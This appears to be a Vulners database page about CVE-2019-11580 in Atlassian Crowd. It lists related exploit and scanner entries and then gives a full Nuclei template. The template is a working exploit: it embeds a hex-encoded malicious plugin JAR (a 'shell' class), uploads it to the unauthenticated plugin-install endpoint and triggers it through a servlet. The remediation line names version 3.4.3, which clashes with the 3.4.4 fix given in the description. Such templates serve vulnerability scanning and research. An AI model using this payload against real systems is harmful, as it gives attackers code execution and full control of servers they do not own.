| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
| Exploit for CVE-2019-11580 | 24 Feb 202111:10 | – | gitee | |
| Exploit for CVE-2019-11580 | 17 Jul 201907:54 | – | githubexploit | |
| Exploit for CVE-2019-11580 | 6 Mar 202017:09 | – | githubexploit | |
| Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE | 22 Jul 201900:00 | – | nessus | |
| Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability | 28 May 201900:00 | – | nessus | |
| Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check) | 16 Jul 202000:00 | – | nessus | |
| Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability | 13 Aug 201900:00 | – | nessus | |
| Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability | 13 Aug 201900:00 | – | nessus | |
| Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability | 13 Aug 201900:00 | – | nessus | |
| Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability | 13 Aug 201900:00 | – | nessus |
id: CVE-2019-11580
info:
name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
author: dwisiswant0
severity: critical
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system.
remediation: |
Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability.
reference:
- https://github.com/jas502n/CVE-2019-11580
- https://jira.atlassian.com/browse/CWD-5388
- https://nvd.nist.gov/vuln/detail/CVE-2019-11580
- http://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-11580
epss-score: 0.95355
epss-percentile: 0.99856
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: atlassian
product: crowd
shodan-query:
- http.component:"Atlassian Jira"
- http.component:"atlassian jira"
tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth,vkev,vuln
variables:
plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
http:
- raw:
- |
POST /crowd/admin/uploadplugin.action HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect: 100-continue
------------------------------f15fe87e95a7
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
Content-Type: application/octet-stream
{{plugin}}
------------------------------f15fe87e95a7--
- |
GET /crowd/plugins/servlet/exp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- "CVE-2019-11580"
# digest: 4a0a00473045022100809d5616039070be165973667424bacad5bef237c0f5a38b9e7a8a78a05138c00220174019408f955820d8d07e7a58748c4a628fcf7113596c857975fc999d89e9cd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation